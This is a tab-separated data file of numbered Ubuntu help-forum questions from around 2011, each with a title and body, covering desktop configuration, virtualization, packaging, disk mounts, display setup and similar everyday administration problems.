28516	redirect requests to my external ip/port to a different external ip/port ?	is it possible to redirect connections to a specific ip/port to an external ip/port ? example : server a has the external ip xxx.xxx.xxx.xxx server b has the external ip yyy.yyy.yyy.yyy user sends a request to server a on port 2106 , i want to redirect it to server b at port 2106 .
28517	will rhythmbox automatically add missing album information when i put a new album in my music folder ?	i 'm new to ubuntu and my question is pretty much the title . i just need help with this because i do n't want to go through and specifically name all of my songs .
28519	how do i share files between windows and ubuntu in a wubi setup ?	i am running ubuntu wubi in windows 7 on my netbook . i want to share files between the two os 's . i know how to make a partition in windows and give it a name like d : but how do i then access it from ubuntu ?
28520	what does a media server need ?	i want to buy a new pc to be used as a media server that streams hd movies , music to any wireless device on my network ( laptop , desktop , tv , etc. ) . i was wondering about the pc hardware 's specifications that i need to have so that it can work just fine ? ( it will be wireless ) is there any tutorial showing how it could be done ? and the security - how can i secure it ? as well as i need it to to host my emails . i mean i have many emails . and sometimes i 'm using desktop , sometimes laptop.. so is it possible to make the server store a copy of my emails , attachments , all sent items ( whether they were from desktop or laptop ) ?
28522	how do i log in to a database without username and password ?	i want to log in to a database by running a sql file from a unix script without supplying username and password ( as root ) . any command to do so ?
28523	is blender good as a cad tool ?	for instance for mechanical engineering ; from what i 've seen , blender is quite flexible and powerful so maybe it serves well for this also ?
28530	how can i tell what package requires a reboot of my system ?	i have unattended-upgrade set up on my ubuntu systems . occasionally i will log in remotely to one of them and i 'll see a message informing me that i need to reboot the system ( in order to complete an upgrade ) . is there a way to determine the specific package ( or set of packages ) which is triggering this notice ?
28538	will gnome 2 aka `` ubuntu classic desktop '' continue to be developed after 11.04 ?	in 11.04 , if you do n't want to use the new unity desktop , you can use ubuntu classic desktop ( selectable from the login screen ) , which is similar to the gnome 2 desktop provided in 10.10 . will ubuntu classic desktop continue to be improved , or is it in `` maintenance mode '' ? if the latter , will it continue to exist for the foreseeable future , or is the plan to eventually discontinue it ? thanks
28544	best virtualization solution for running windows 7 as a guest ?	i depend upon ubuntu for most of my work but i still need windows 7 for some applications such as office 2010 casual gaming adobe cs4 and other windows softwares that are not available on ubuntu yet . i checked wine but as of now it provides no support for office 2010 and most of my games and softwares . so , i decided to go for virtualizing windows 7 inside ubuntu , but i am confused about which virtualization software should i use on ubuntu for virtualization .
28547	how do i launch chromium with multiple tabs open using the main menu ?	i do n't want this to be default behavior for chromium though .
28550	how do i install plc-emu ?	i have downloaded the tar.gz file for ubuntu 10.10 64-bit from http : //plcemu.sourceforge.net/ but i do n't know how to install this . does anyone know how to install plc-emu from the .tar.zip ? tried but i cant install the software ... it gives error melwin @ firefly : ~/desktop/plcemu-14a $ sudo make [ sudo ] password for melwin : makefile:25 : warning : overriding commands for target `hardware.o' makefile:23 : warning : ignoring old commands for target `hardware.o' cc -o -g -c plcemu.c in file included from plclib.h:1 , from plcemu.c:1 : plcemu.h:6 : fatal error : asm/io.h : no such file or directory compilation terminated . make : *** [ plcemu.o ] error 1
28556	are there any alternatives to nautilus ?	are there any good alternatives to nautilus ? i 'm looking for something lightweight , with a cleaner interface , but the ability to manually enter file paths is still important . any suggestions ?
28559	ca n't find hg-buildpackage	it was suggested i use hg-buildpackage to build my ubuntu packages because it will ignore my .hg folder and files . however i ca n't seem to find it in the ubuntu 10.10 repos . how can i get hg-buildpackage on ubuntu 10.10 ?
28561	how can i add more disk space to my home directory ?	the current home directory gets full . can i assign more disk space to the home directory somehow or are there any other solutions ?
28562	how do i create a ppa for a working program ?	let 's assume i have a working application written in c , c++ or python . i want to create a launchpad ppa so others can easily install it from a package . please give step by step instructions for doing this from beginning to end . ( or provide a link that does the same ; ) does the programming language matter ? ( could it be a bash script ? ) do i need to add anything to my build ? where should the build install itself to ? how do i define dependencies ? how do i use dependencies ? how do i create a .deb ? what do i need to do before uploading to launchpad ?
28563	gtk applications do not start	i have a fresh install of ubuntu 10.04 server on nodes of a computational cluster , and i access the nodes via ssh . i configured a x server , which i start with the command startx -- -ac . the server is running fine on port :0 . then , i set the environment variable display to :0 . now , when i run a gtk application on the node , it fails with the following error : error : unable to initialize gtk , is display set properly ? now , my question is , is there any runtime library that i need for running gtk applications on top of a x server ? i 'm probably missing something obvious here , but i ca n't tell what : p
28564	run simple bash script to start applications at login	i want to run a simple bash script automatically when i log in . for example # ! /bin/bash echo `` start spotify '' gnome-terminal -e spotify -- title spotify when i run this command , one gnome-terminal shows up and spotify show up . i also want the gnome-terminal to popup `` hidden '' in a different virtual desktop . ( one of the other four virtual desktops you can choose from taskbar ) i tried to add this to /home/me/.bash_login or something , but that did n't work..
28566	during login , why does it take more time to give an error message , than to login ?	when i login after boot , or maybe after a idle time , i am presented with a login box . if i enter the incorrect password , it takes a longer time to verify , and give the error message , than entering the correct password , and getting logged in . why is that ?
28567	unable to turn on seamless mode in virtualbox	i 'm not able to switch to seamless mode in virtualbox with ubuntu 10.04 or 9.10 as guest os 's . i have tried the seamless mode with xp as guest os , and it works absolutely fine . the host os is windows 7 . i have in-built via/s3g unichrome pro igp graphics , and i have allocated 30 mb out of 64 mb of graphics memory . i 've also 1.5 gb of ram . i also tried installing guest additions but it still did n't work . virtualbox version is 4.0.4r70112 . the host+l does not lead to seamless mode . i.e . under the machine menu in virtual box window `` seamless mode '' is disabled ( comes in grey color ) . how can i get the seamless mode to work ? please help !
28570	dual boot . install 2nd os on separate drive	i currently have kubuntu running on a large sata drive . i am considering setting up kxstudio to dual boot . rather than messing up my current partitions i am thinking of adding an old ide drive and installing kxstudio there . i 'll probably share the swap and data partitions . any potential pitfalls with this ? i 've not dual-booted multiple linuxes before . is kxstudio likely to set up grub for me ?
28575	how to schedule an update ?	i want to schedule my machine to run all my updates unattended at night , but this requires my authentication ( which pretty much axes the unattended part ) . would it be best to use a cron job or is there something better ?
28578	will unity 2d top panel be theme-able and support transparency ?	does anyone knows if the 2d ( qt ) version of unity will be theme-able and also will support transparency in the top panel ? how customizable is unity 2d planned to be ?
28579	why are sharefolders so slow when used with apache on virtualbox	when i put a site on a shared folder on virtualbox i get a very slow response time . if i move it to a non-shared folder such as my home folder it responsed instantly . i am running a ubuntu guest on a snow leopard host .
28581	power manager keeps shutting down the display	i 'm probably missing something here . i 'm using the default ubuntu power manger , i set it up like this : on ac : no screen dimming when idle , never put computer to sleep , never put display to sleep . on battery : i kept the default settings . still , ubuntu does whatever it likes , and after 15 min it puts the display to sleep . does anyone have the same problem and found a way to solve it ? i 'm using an eee pc with ubuntu 10.10 desktop .
28583	how do i add a system-wide menu item to the applications menu ?	i have manually installed a software to /opt and i wanted to add it to the applications menu . although ubuntu makes it dead easy to add it to my user 's menu , how do i add it system wide , so that all users will see the application in their menu ?
28584	no init.d file in the etc directory	when try to cd into init.d or less init.d i get an error message : no such file or directory where is init.d - why do i get that error ?
28586	speech to text - dragon speaking software alternative	is there any good speech to text tool like one we have for win & mac named dragon speaking software ? i found this question - alternative to dragon naturally speaking ? and i was wondering if anyone has tried anything from the list - http : //en.wikipedia.org/wiki/speech_recognition_in_linux which works good enough . i am looking for some recommendations on the basis of what has worked for other community members . ca n't try all of them one by one .
28592	how do i merge two icon sets ?	i want to merge the standard ubuntu mono icon set and the faenza icon set . i would like to keep the standard ubuntu icons in the panel ( including icons for the likes of dropbox , file transfers etc . ) and replace all the other application icons with the faenza versions . how would i go about this ?
28593	how usable is blendercad project right now ?	there is not much documentation in the project page . did anyone try it on ubuntu ? in any case , what to expect from it ? can it become a foss alternative to catia , autodesk inventor or solidworks ?
28594	how do i readd the messaging indicator ?	i mistakenly removed by message indicator from the panel . how can i add it again ?
28597	where can i install termcap from ?	from apt-get or aptitude there 's just termcap-compact , but i still see `` no termcap library found '' when trying to install my software ( a development kit from another enterprise ) . this happens just on my computer . this page has a .tar.gz , but looks like it 's the source , i how to install it.. where can i install termcap from ?
28600	ahci hotswap in lucid server	does lucid support hotswapping of ahci devices ? is there anything more to it than simply unmounting all filesystems on the drive to be disconnected and plugging in the new disk ? 00:1f.2 sata controller : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 6 port sata ahci controller ( rev 02 ) is the controller i 'm working with . bios is set to ahci . i also tried simply unmounting and unplugging . that seemed to work fine . plugging in a new drive locked up the system . ahci kernel module is also loaded . i 've also looked at the raid wiki on kernel.org which talks about hardware requirements for ahci hotswapping of disks . my drives and cables all appear to meet the criteria , but most of that info pertains to the electrical side ( grounding , etc ... ) .
28603	some files in /usr/sbin/ are never being replaced ?	i 've a question concerning a weird issue i never ran into before even though i am working with many servers for quite a long time . so there is the cherokee web server that i compiled and installed with ./configure -- prefix=/usr make make install before this 'upgrade ' i deleted the old version completely ( also checked with finding tools ) and backed up the existing configuration which i upgraded and copied back to its original folder later . but the basic problem are two files : cherokee-worker and cherokee-admin . those files were not copied into /usr/sbin/ correctly . to prove my suspicion i executed some commands : /home/paul/build/cherokee/cherokee-1.2.1/cherokee/cherokee-worker -i > > version : 1.2.1 cp /home/paul/build/cherokee/cherokee-1.2.1/cherokee/cherokee-worker /usr/sbin/cherokee-worker /usr/sbin/cherokee-worker -i > > vesion : 1.0.8 the same issue happens with cherokee-admin . the most weird thing is that if i replace the actual copy of cherokee-worker in /usr/sbin/ with a symbolic link to the working file in / ... /build/../cherokee-1.2.1 it works ! rm /usr/sbin/cherokee-worker ln -s /home/paul/build/cherokee/cherokee-1.2.1/cherokee/cherokee-worker /usr/sbin/cherokee-worker /usr/sbin/cherokee-worker -i > > version : 1.2.1 it seems like a hard copy of cherokee-worker/-admin is n't working properly . but how come ? do you know what happens ? i have absolutely no clue what 's going on . thanks for your help in advance ! paul
28604	heartbeat does n't start	heartbeat do n't start on automatic . network interface is not up when heartbeat start os version : 10.04 exact message in boot.log : starting high-availability services : bond1 : unknown interface : no such device /usr/lib/heartbeat/findif version 2.99.1 copyright alan robertson usage : /usr/lib/heartbeat/findif [ -c ] options : -c : output netmask as the number of bits rather than as 4 octets . environment variables : ocf_reskey_ip ip address ( mandatory ! ) ocf_reskey_cidr_netmask netmask of interface ocf_reskey_broadcast broadcast address for interface ocf_reskey_nic interface to assign to ipaddr2 [ 1820 ] : warning : [ /usr/lib/heartbeat/findif -c ] failed ipaddr2 [ 1795 ] : info : resource is stopped heartbeat failure [ rc=6 ] . failed . heartbeat [ 1868 ] : 2011/02/23_10:04:23 error : glib : get broadcast for interface bond1 failed : no such device heartbeat [ 1868 ] : 2011/02/23_10:04:23 error : glib : ip interface [ bond1 ] does not exist
28606	how do i get notification icons to follow my icon theme ?	basically i am using awoken icon set and the notification area shows different icons than that of awoken i.e colored tray icon . what can i do to bring in consistency or similarity ? i found this and this but both did not help .
28608	how do you use an android tablet as a second display ?	i 've noticed people using a product for windows and mac called idisplay which lets you use your android or ipad as a secondary display . this seems like a great idea , and something that could be done on ubuntu . unfortunately , i 've got no idea how to get started . how could you re-create this setup on ubuntu ?
28610	i ca n't change any user settings with my login , why ?	the account i 'm using is the first account on the system and it can use the sudo command . but when i 'm trying to change anything in the user settings program nothing happens . i can change my own password but not the other user 's which i have created . could this be because of that i 'm using a nx remote session to administrate the computer ? or is there any settings which i have forgotten to do ?
28613	how does automated hotplug mounting work ?	i was reading a bit about gnome-mount , hal , udev , etc . it left me with a couple of faint ideas how mounting a hotplug device might work in the latest ubuntu release . could someone give a detailed explanation about what exactly is going on after a hotplug device ( i.e . usb-stick ) was plugged in ?
28614	gvim configuration does not work like it should	i have a little problem with my vim config . this what i got in my home/user/.gvimrc syntax enable `` enable syntax hl colorscheme peaksea set background=dark set gfn=inconsolata : h11 set nonu set history=1000 set scrolloff=3 set number `` turn on line numbers '' save a global session file on session close nmap sq < esc > : mksession ! ~/.vim/session/session.vim < cr > : wqa < cr > function ! restoresession ( ) if argc ( ) == 0 `` vim called without arguments execute 'source ~/.vim/session/session.vim' end endfunction autocmd vimenter * call restoresession ( ) the colorsheme work , but the font has way to much spacing . every sentence is twice as long . i installed the inconsolata font and i have the same config on my windows 7 box and it works fine .
28619	how do i install an application by deb file for a single user only ?	when installing applications via the software center or by a deb file they will usually be installed system wide for all users . is there a way to install an application for a single user only ?
28624	dockbarx applet not loading	i used to have dockbarx applet installed on my gnome panel . however one day when i login in i got a error message which can be seen in the screenshot below . so i removed it , and then tried adding it again to the gnome panel but i still get the error message . i am running the latest version of dockbarx 0.43 on ubuntu 10.10 maverick meerkat with the helpers enabled and media buttons etc . i did not update it recently and have been using this version for a couple of weeks now and got this problem only now . i tried a reinstall of all the components of dockbarx but still get the error message . here is the ~/.dockbarx/log/dockbarx.log error | 2011-03-02 12:10:18,984 | traceback ( most recent call last ) : error | 2011-03-02 12:10:18,985 | file `` /usr/bin/dockbarx_factory '' , line 31 , in < module > error | 2011-03-02 12:10:18,985 | import dockbarx.dockbar error | 2011-03-02 12:10:18,985 | file `` /usr/lib/pymodules/python2.6/dockbarx/dockbar.py '' , line 37 , in < module > error | 2011-03-02 12:10:19,187 | from groupbutton import * error | 2011-03-02 12:10:19,187 | file `` /usr/lib/pymodules/python2.6/dockbarx/groupbutton.py '' , line 40 , in < module > error | 2011-03-02 12:10:19,324 | import zg error | 2011-03-02 12:10:19,324 | file `` /usr/lib/pymodules/python2.6/dockbarx/zg.py '' , line 34 , in < module > error | 2011-03-02 12:10:19,399 | iface = client.zeitgeistdbusinterface ( ) error | 2011-03-02 12:10:19,400 | file `` /usr/lib/pymodules/python2.6/zeitgeist/client.py '' , line 184 , in __init__ error | 2011-03-02 12:10:19,428 | self.object_path ) error | 2011-03-02 12:10:19,428 | file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 244 , in get_object error | 2011-03-02 12:10:19,496 | follow_name_owner_changes=follow_name_owner_changes ) error | 2011-03-02 12:10:19,496 | file `` /usr/lib/pymodules/python2.6/dbus/proxies.py '' , line 241 , in __init__ error | 2011-03-02 12:10:19,520 | self._named_service = conn.activate_name_owner ( bus_name ) error | 2011-03-02 12:10:19,520 | file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 183 , in activate_name_owner error | 2011-03-02 12:10:19,520 | self.start_service_by_name ( bus_name ) error | 2011-03-02 12:10:19,520 | file `` /usr/lib/pymodules/python2.6/dbus/bus.py '' , line 281 , in start_service_by_name error | 2011-03-02 12:10:19,521 | 'su ' , ( bus_name , flags ) ) ) error | 2011-03-02 12:10:19,521 | file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 620 , in call_blocking error | 2011-03-02 12:10:19,574 | message , timeout ) error | 2011-03-02 12:10:19,575 | dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.execfailed : failed to execute program /usr/local/bin/zeitgeist-daemon : success how can i solve this problem ?
28627	gnome trash on cifs mount random behaviour	i 'm seeing some weird behaviour in ubuntu 10.04 . i have a cifs mount that 's mounted by fstab as follows : //192.168.1.1/share /media/storage cifs_netdev , username=guest , password= '' '' , uid=1000 , guid=100 , file_mode=0777 , dir_mode=0777 0 0 i can mount the share using : sudo mount -a my user can then access it , create and delete files . the deleted files appear in the gnome trash applet . a folder /media/storage/.trash-1000 is created automatically . when i log out , restart the machine and log in , the cifs share is mounted but the trash applet is empty . if i unmount the share with sudo umount /media/share then remount with sudo mount -a the trash applet displays the contents of the .trash-1000 folder ! it gets stranger ... sometimes after umount then mount -a the trash is still empty , but another round of umount then mount -a fixes it . it seems like the trash applet is `` forgetting '' to scan the /media/storage mount point and is not always finding the .trash-1000 folder at that mount point . even when the trash applet is not displaying any trash from /media/storage/.trash-1000 i can still delete things from the /media/storage and they 're moved to the .trash-1000 folder . so i conclude there 's a bug in the trash applet ... anyone know how to fix it ?
28631	what 's wrong with my ext4 partition ?	what is wrong with this picture ? top is output from `` df -h '' , bottom is gparted . i suspect i 'm missing a lot of free space . no problems other than that ( yet ) . can somebody suggest the best ( non-destructive ) way to correct this ? sudo dumpe2fs -h /dev/sda3 : ( source http : //pastebin.com/navrdt4e ) filesystem volume name : < none > last mounted on : / filesystem uuid : 9f6eff64-60d7-4eec-81d5-1e8acd818b38 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 1602496 block count : 6406144 reserved block count : 320306 free blocks : 4842284 free inodes : 1361222 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 1022 blocks per group : 32768 fragments per group : 32768 inodes per group : 8176 inode blocks per group : 511 raid stride : 32692 flex block group size : 16 filesystem created : sun nov 8 18:18:13 2009 last mount time : tue mar 1 01:04:27 2011 last write time : mon feb 28 04:27:34 2011 mount count : 16 maximum mount count : 28 last checked : thu feb 24 06:23:39 2011 check interval : 15552000 ( 6 months ) next check after : tue aug 23 07:23:39 2011 lifetime writes : 227 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 first orphan inode : 268015 default directory hash : half_md4 directory hash seed : cc101517-e617-482b-a883-a72919419c84 journal backup : inode blocks journal features : journal_incompat_revoke journal size : 128m journal length : 32768 journal sequence : 0x001d3000 journal start : 7787 fdisk and parted output per requests : http : //pastebin.com/egvh7ken solution : ( thanks hamish downer ) boot to a livecd and run '' sudo e2fsck -f /dev/sda3 '' followed by '' sudo resize2fs -p /dev/sda3 ''
28632	how can i remove black bars at smaller resolutions ?	i have an hp pavilion dv1000 laptop with a widescreen monitor . my monitor works well at its native resolution , but when i choose 1024x768 , i see black bars on left and right side of the monitor . i used a live-cd of an old backtrack 3 distro , and i notice it can stretch the image there , but in ubuntu i ca n't . can someone help me ?
28635	how to add utf-8 support to my hard disk in fstab ?	i use ubuntu ( spanish language ) . sometimes i get this error when i use special characters ( codification error ) so i read that if i edit a file of my hard disk by using gedit /etc/fstab and adding utf8 i can fix it ... . i had this line : uuid=bfb5b95e-bf68-464a-8abf-d6027b039fa4 / ext4 errors=remount-ro 0 1 i adeed utf8 like this : uuid=bfb5b95e-bf68-464a-8abf-d6027b039fa4 / ext4 errors=remount-ro , iocharset=utf8 0 1 but i messed my ubuntu and i ca n't log in now to my ubuntu so im using live session ... so i 'll have to remove that code in order to be able to use my ubuntu again . can someone tell me how that line should look like ?
28637	how do i try unity from natty ?	how can i try the newest codebase of unity , so that i can send bug-reports and feature requests to the unity developers ?
28639	how do i restore the trash icon on the desktop ?	i accidentally removed the trash icon from the desktop , is there a way to put it back ?
28644	how can i backup my ppas ?	related to this question . but my concern is that over the past year , most of my more interesting ( or used ) applications are from ppas , and just backing up my sources list wo n't add the associated launchpad keys the way that add-apt-repository does . so i 'm looking for a way to list all the ppa urls ( like ppa : chromium-daily/stable ) so that i can easily script a series of add-apt-repository commands to add them into a new installation gracefully . short of dumping my bash history of course . which might be feasible , depending on how far back that file goes back ?
28649	by default , the left alt key drags and moves windows . how can i get rid of that ?	it competes with the alt behavior in photoshop , so i want the left alt key to do nothing .
28656	how can i find the value of the `` visual effects '' setting using the command line ?	on 10.04 ( and other versions , but i am asking about 10.04 ) , going to system â preferences â appearance and selecting the visual effects tab shows possible values of none , normal , and extra . how can i query from the command line what the current setting is ?
28659	inconsistent mouse cursor status while typing	i have noticed that when i type in some programs , text editor , terminal , bluefish , gnome baker , etc . the mouse cursor disappears while i am typing . in other programs like firefox and libreoffice , it does not . i am not an application programmer , but i imagined it has to do with their cross-platform nature and the way they are compiled or the toolkits they use . then i noticed that gnome-do behaves the same way , the cursor stays on screen while typing . why is there inconsistent handling of the mouse cursor , while typing , across different applications ? thank you .
28661	swap utilization : system level versus individual processes	on my top output , at header level , swap is showing 0k used . but on each individual process the swap is shown as a non-zero value ( output column enabled with option p ) . what does this mean ? swap : 4870140k total , 0k used , 4870140k free , 571300k cached pid user pr ni virt res shr s % cpu % mem time+ swap command 2448 max 20 0 323m 87m 27m s 0 4.4 1:23.31 236m chrome
28663	why is the console hanging randomly ?	ubuntu 10.10 server x64 installed as virtual box vm . fresh install plus postgresql and tomcat6 installed via aptitude . rebooted the server and now when i run some command the console hangs . for instance , i run `` sudo shutdown now '' and then nothing happens but i am not returned to the prompt . i hit ctrl+c and nothing happens except ^c appears on the following line . i can type whatever and it will show up inline . i switch to tty2 and try to login and i only get as far as [ username ] [ enter ] and that console hangs . one other thing - after `` sudo reboot '' the console appears to hang ( just like above ) when shutting down tomcat6 . any idea what 's going on or what i should check ? thanks !
28666	empathy chat notification	i am using empathy im client for my google hosted mail domain on 9.04 , 9.10 , 10.04 desktops . i could able to chat from the google mail chat to empathy and i have set empathy notification to get notified when a message is received and it pops up . whenever it pops up , it show the complete message of the sender which i do n't like/want the message to be revealed to everyone whoever looks at my desktop . is there anything i could do so that the actual message is not shown whenever empathy pops up instead showing any message something similar to `` you have got a new message '' ? .
28667	how do i do right clicks on ibook g4 ?	i ca n't figure out how i allow my ibook to right click in ubuntu . it 's one big button ; so , i used to hold option and click . i 'm willing to do that , but i ca n't figure out how . unless , of course , i 've completely let the noob out and one does n't right click in ubuntu . thanks for the help !
28669	how do i get keyboard to write hiragana instead of katakana ?	i added the japanese layout in keyboard preferences , however all the layouts look like being in katakana . i suspect that the key that is left of number 1 ( above tab and under esc ) could be the one to switch from katakana to hiragana however i do n't have that key in my keyboard and my other toshiba laptop does not have it either . i really do n't know what to do , i simply want to be able to write in hiragana in ubuntu . thanks
28671	distro that i can load into ram ?	is there a modified version of ubuntu that i can choose to load to ram on start up ? kinda like the livecd , but that can be easily modified ( ie : i can install stuff ) when i choose to boot from disk . the idea is to install it to a usb drive . i know there 's something similar but slax is lacking in many departments . a `` full '' version ubuntu would be better . a liveusb installation seems to be pretty close to what i want , but apparently i have to choose whether or not it will be persistent by the time i install it . i want to be able to choose that every time i boot .
28675	change touchpad horizontal and vertical acceleration/sensitivity ?	how do i individually change the horizontal and vertical acceleration of the cursor ? i can scroll side-to-side in a single stroke on a 1600x900 monitor on my laptop , but i can never do that vertically . furthermore , the touchpad seems to be too sensitive horizontally ( i hold my index finger still , but the cursor subtly moves ) ... is this fixable ? i 'm using a synaptics touchpad .
28676	chrome starts download instead of displaying webpage from local server	i set up apache web server . when i open http : //localhost in google chrome , it asks me to download a file . it works correctly with firefox . how can i resolve this issue ?
28682	unable to locate package xinetd	i tried to install xinetd by the command sudo apt-get install xinetd . i got this error message unable to locate package xinetd why ? is n't it supposed to be under init.d folder ?
28685	how can i delay a specific program on startup ?	how to delay a program such as cairo-dock ( no opengl ) or firefox sometimes it crashes when started with other startup apps . i want it to start 10 seconds late so it will not crash . thank you , ( i 'm just using ubuntu for a month , so please advice ! )
28697	how to remove the window border for gnome-terminal ?	is it possible to remove the window border for gnome-terminal only in compiz ? i recall that it used to be possible to do this with a command-line option , but i can not find it anymore .
28698	why am i asked for a password after automatic login ?	i use automatic login because i do n't want to enter a password every time i start the system . although automatic login works , i 'm still asked for my password after the desktop is loaded ( i need to enter it three times ) . how can i fix this ?
28700	how can i have only two specific keyboard layouts in my system without 'us ' ?	i want only two keyboard layouts in my system : us altgr-intl ( usa international ( altgr dead keys ) ) and gr ( greece ) , so this is what i 've selected in system → preferences → keyboard → layouts . however , every time i begin a new gnome session ( reboot , logout/login ) , the us keyboard layout is automatically inserted at the top of the list . i created a small script called fixlang that ensures the desirable result : layouts= ' [ us altgr-intl , gr ] ' # tab between us and altgr key=/desktop/gnome/peripherals/keyboard/kbd/layouts active_layouts= '' $ ( gconftool -g $ key ) '' if [ `` $ active_layouts '' ! = `` $ layouts '' -o `` $ 1 '' == -f ] then gconftool -t l -- list-type=str -s $ key `` $ layouts '' fi which i run on login . however , this is a kludge . how can i ensure that gnome does not mess with my keyboard layout selection ?
28704	avoid random disk names	i have ubuntu server 10.04 1 system disk , and 5 disks in raid-5 configuration . the problem is that names of these disks are changed from time to time , they are being randomly mixed from time to time ( sda , b , c , d , e , f - so system disks might be sda , or sdc at different time for example ) ... . is there any way to fix drive names , so that even if it 's disconnected for example , no other drive can occupy this letter based on disk uuid or something ?
28706	split a text file by its entries	i 'm trying to analyze an enormous text file ( 1.6gb ) , whose data lines look like this : 20090118025859 -2.400000 78.100000 1023.200000 0.000000 20090118025900 -2.500000 78.100000 1023.200000 0.000000 20090118025901 -2.400000 78.100000 1023.200000 0.000000 i do n't even know how many lines there are . but i 'm trying to split the file by date . the left number is a time stamp ( these lines are from 2009 , january 18th ) . how can i split this file into pieces according to the date ? everything i know would be to grep file '20090118* ' > data20090118.dat , but there sure is a way to do all the dates at once , right ? the number of entries per date differ , so using split with a constant number wo n't work . thanks in advance , alex
28709	the development version 11.04 will not install	i 'm having troubles installing ubuntu 's development version 11.04 . i 'm attempting to install it in a vm . when i try to install directly i get a warning saying a fatal error has occurred , and then it boots into a live desktop session . when i attempt to install here , the installer hangs after i 've entered the username and password . any ideas ? i 'm using virtualbox ose , i 've given the vm 1 gb ram , and a 50 gb hdd . i 've included a screenshot of the error below :
28710	can unity reprogram touchpad mouse click 2 to a keyboard key ?	my laptop touchpad has left button ( for mouse click 1 ) , a right button ( for mouse click 3 ) . to get mouse click 2 you must simultaneously press the left and right buttons . will unity let me reprogram this action to . say , alt-z ( or some other key combination ) ?
28711	external backup - `` cp : can not create regular file '' error	i have always backed up my home directory to an external hard drive using the cp -r command . until recently , it worked fine , but now i regularly get the error message cp : can not create regular file followed by invalid argument or cp : can not create symbolic link followed by operation not permitted . i 've tried sudo cp -r but the issue persists . what am i doing wrong ?
28716	how do you unset an environmental variable using a script ?	if i have http_proxy defined in default my environment ( by ~/.bash_profile ) , how can i unset the variable from a script ? i know that i can do unset http_proxy from the command line , but if i try to put this command in a script and run it , http_proxy is still defined . if i load the script using bash or source , it is still defined .
28719	is running temperature considered when a machine is added to the 'ubuntu certified ' list ?	i have a 2 yr old hp pavillion dv4 laptop . ubuntu runs fine . but i recently noticed that the temperature of the cores ( with just a browser open , not playing flash videos ) is significantly higher than when i run windows 7 . if i buy one of the laptops listen in the 'ubuntu certified list ' , is it likely to run ubuntu at the same temperatures as windows 7 ?
28721	nautilus file share for multiple users is not working . only owner gets access	i have always had trouble setting up samba shares with ubuntu . in the past i 've tried getting it to work by configuring /etc/samba/smb.conf but never achieved what i wanted . last time i managed to get it working by making a share with nautilus built in file sharing ( which utilises samba ) . now when i try do it again it does n't work . ( running ubuntu 10.10 desktop x64 ) what i 'm trying to achieve is a share which is available for multiple users ( those who are in the same group ) and not just the owner ( who also is included in the group ) . as it is now i can connect with only the owner , the others are getting an error when i try to connect with windows 7 . all the users are within the same group and the folder permissions are 770 . the files and folders have the correct group settings . i think there is no restrictions in the user settings for the other users blocking them and i marked `` make available to other users ( or whatever it says ) '' in the file sharing dialog . what can i do ?
28723	can i make evolution to automatically check emails when i launch it ?	by default when evolution is launched , i have to press the button `` check emails '' ( or press f9 ) to receive new emails . i would like it to be automatic each time i launch evolution . is it possible ?
28728	how can i launch thunderbird from command line and auto check imap email ?	i want to use thunderbird as an imap client to backup gmail and would prefer to run it from a cron ... basically want to wake it up , sync imap folders than shutdown ... i tried offlineimap with no success and it seems that thunderbird is a reasonable solution . what would the command line settings be to have it check , download , then shutdown ?
28730	upgrade wo n't allow second display to go to 1920x1080	i just upgraded to 10.10 last night and i 'm having issues now with dual display from my laptop dock . this was working in the previous release with a manual xrandr command : xrandr -- output lvds1 -- off -- output dp1 -- mode 1920x1080 & & xrandr -- output vga1 -- mode 1920x1080 -- left-of dp1 when i run this now , the dp1 output does n't have a mode for 1920x1080 . the two displays are a matched pair of dell 22 '' that are both 1920x1080 . the laptop/dock is a lenovo x201 with the intel graphics in it . the dock does vga and displayport out . when i attempt to manually add the mode xrandr -- addmode dp1 1920x1080 and rerun my command , i lose both displays altogether . i have to then blindly reset to just one of them in order to get display back . if i avoid the 1920 and just attempt to setup dp1 at the 1280x1024 max it thinks it has , then the second display will come up , but obviously looks horrible since it 's non-native resolution . i 've grabbed the updated xorg intel driver from the stable x ppa and am running : 2:2.13.901-2ubuntu2~xup~maverick xrandr output screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 lvds1 connected ( normal left inverted right x axis y axis ) 1280x800 60.2 + 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 connected ( normal left inverted right x axis y axis ) 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 i 've submitted a bug report here : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/729788
28733	how do i run a script after openvpn has connected successfully ?	how can i associate a script to openvpn so that it runs when the vpn is connected successfully ?
